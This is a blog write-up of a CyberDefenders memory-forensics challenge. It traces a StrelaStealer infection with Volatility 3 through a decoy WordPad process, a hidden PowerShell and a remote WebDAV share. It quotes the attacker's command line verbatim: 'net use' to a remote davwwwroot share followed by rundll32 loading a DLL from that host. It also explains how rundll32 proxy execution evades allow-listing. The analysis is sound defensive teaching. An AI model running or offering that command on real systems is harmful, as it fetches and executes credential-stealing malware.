Post

Forensic Investigation Report: Operation 'Reveal' — Memory Analysis

Posted Updated
By El OMARI Zakaria
4 min read
Forensic Investigation Report: Operation 'Reveal' — Memory Analysis

Platform: CyberDefenders
Challenge: Reveal
Category: Memory Forensics / Endpoint Analysis
Difficulty: Easy
Tools: Volatility 3, OSINT
Achievement: Proof of Completion

1. Executive Summary

A memory dump was acquired from a workstation suspected of being compromised. The investigation revealed a sophisticated multi-stage attack where a user executed a malicious loader. This loader utilized a “decoy” tactic to distract the user while silently launching a PowerShell script. The script established a WebDAV connection to a remote command-and-control (C2) server and executed the StrelaStealer malware using System Binary Proxy Execution (Rundll32). The attacker successfully compromised a local administrator account.

2. Investigation Phases

Phase I: Process Enumeration & Anomaly Detection (Q1 & Q2)

Objective: Identify running processes and detect suspicious activity.

We began by analyzing the process hierarchy to understand “who launched whom.” The windows.pstree plugin is superior to a simple list because it visualizes parent-child relationships, which are critical for spotting anomalies.

Command Executed:

1

python3 vol.py -f 192-Reveal.dmp windows.pstree

Findings: Scanning the output for a suspicious 10-letter process name, we identified a powershell.exe instance that stood out due to its command line arguments and network activity.

  • Malicious Process: powershell.exe (PID: 3692)
  • Parent Process (PPID): 4120

Why it was suspicious: Legitimate PowerShell instances rarely run with -windowstyle hidden or connect directly to external IP addresses. The presence of these flags was a strong indicator of malicious intent.

Phase II: Payload & Command Line Analysis (Q3, Q4, Q5)

Objective: Deconstruct the attack vector and malicious commands.

We isolated the specific command line associated with PID 3692 to understand the attacker’s intent.

Extracted Command Line:

1

-windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry

Deconstruction:

  1. The Connection (WebDAV Abuse):

    • net use \\45.9.74.32@8888\davwwwroot\
    • The attacker used the net use command to map a network drive to a remote server.
    • Shared Directory: davwwwroot
    • Significance: davwwwroot is the default share name for WebDAV. Attackers use this protocol because it traverses firewalls easily, appearing as standard HTTP/web traffic.

  2. The Payload (Second Stage):

    • rundll32 ... 3435.dll,entry
    • The attacker did not download an executable (.exe). Instead, they “streamed” the execution of a malicious DLL file directly from the remote server.
    • Malicious File Name: 3435.dll

  3. The Technique (MITRE ATT&CK T1218.011):

    • The use of rundll32.exe to execute code contained in a .dll file is a classic example of System Binary Proxy Execution.
    • Why: It bypasses application whitelisting. Security tools trust the Microsoft-signed rundll32.exe, allowing the malicious code inside the DLL to run undetected.

Phase III: Attribution & User Context (Q6)

Objective: Determine the compromised user account and privilege level.

To assess the impact, we needed to know which user owns the malicious process. In Windows, this is tracked via Security Identifiers (SIDs).

Command Executed:

1

python3 vol.py -f 192-Reveal.dmp windows.getsids --pid 3692

Findings:

  • User SID: S-1-5-21-...-1001 mapped to the username Elon.
  • Group SIDs: The output showed membership in S-1-5-32-544 (Administrators).

Conclusion: The compromised user is Elon. Because Elon is a local administrator, the malware inherited these permissions, granting the attacker full control over the workstation.

Phase IV: Threat Intelligence (Q7)

Objective: Identify the specific malware family.

We pivoted from internal forensics to external intelligence. Searching for the unique Indicators of Compromise (IOCs) gathered:

  • IP: 45.9.74.32
  • Behavior: WebDAV (davwwwroot) + Rundll32 + DLL execution

Verdict: Public sandbox reports (ANY.RUN) link these specific IOCs to StrelaStealer. This malware family is known for stealing email credentials (Outlook/Thunderbird) using polyglot files and WebDAV delivery methods.

Phase V: The “Patient Zero” Discovery

Objective: Identify the infection vector (how the malware started).

Analysis of the process lineage (via pslist and psscan) revealed that both powershell.exe (PID 3692) and wordpad.exe (PID 9112) were spawned by the same parent, PID 4120.

1
2
3

PID     PPID    Name             CreateTime
9112    4120    wordpad.exe      07:00:03
3692    4120    powershell.exe   07:00:03

Attempts to identify PID 4120 using psscan were unsuccessful, indicating the parent process terminated immediately after execution. This behavior is consistent with a ‘dropper’ or ‘loader’ malware designed to execute a payload and vanish to evade detection.

The Decoy Tactic: The now-vanished parent process (PID 4120) launched two children at the exact same second:

  1. The Bait: wordpad.exe opened a document to distract the user.
  2. The Hook: powershell.exe launched the malware in the background.

This confirms the user likely double-clicked a malicious file (e.g., a fake shortcut or script) masquerading as a document.

3. Incident Timeline

Based on the CreateTime timestamps and process lineage, we reconstructed the precise flow of the attack.

Time (UTC)Event TypeDescription
07:00:03Initial ExecutionThe user “Elon” executes a malicious launcher (PID 4120).
07:00:03Decoy LaunchThe launcher spawns wordpad.exe (PID 9112) to display a fake document and lower user suspicion.
07:00:03Malware LaunchSimultaneously, the launcher spawns powershell.exe (PID 3692) with hidden window flags.
07:00:03C2 ConnectionPowerShell executes net use, connecting to the attacker’s IP 45.9.74.32 via WebDAV (share: davwwwroot).
07:00:03Payload ExecutionPowerShell uses rundll32.exe to load and execute the StrelaStealer payload (3435.dll) from the remote share.
Post-Inf.Data Exfiltration(Inferred) StrelaStealer begins harvesting credentials from local mail clients.

4. Conclusion

The forensic analysis confirms a successful infection of the workstation by StrelaStealer. The attack leveraged valid Windows tools (PowerShell, Rundll32, Net Use) to evade detection and used a social engineering decoy to trick the administrator “Elon.” Immediate remediation is required, including password resets for the affected user and network blocking of the identified C2 IP.

Analysis Date: December 13, 2025
Analyst: El OMARI Zakaria

CTF Write-ups, Digital Forensics, Memory Analysis
cyberdefenders volatility3 memory-forensics strelastealer webdav rundll32 powershell endpoint-forensics osint
This post is licensed under CC BY 4.0 by the author.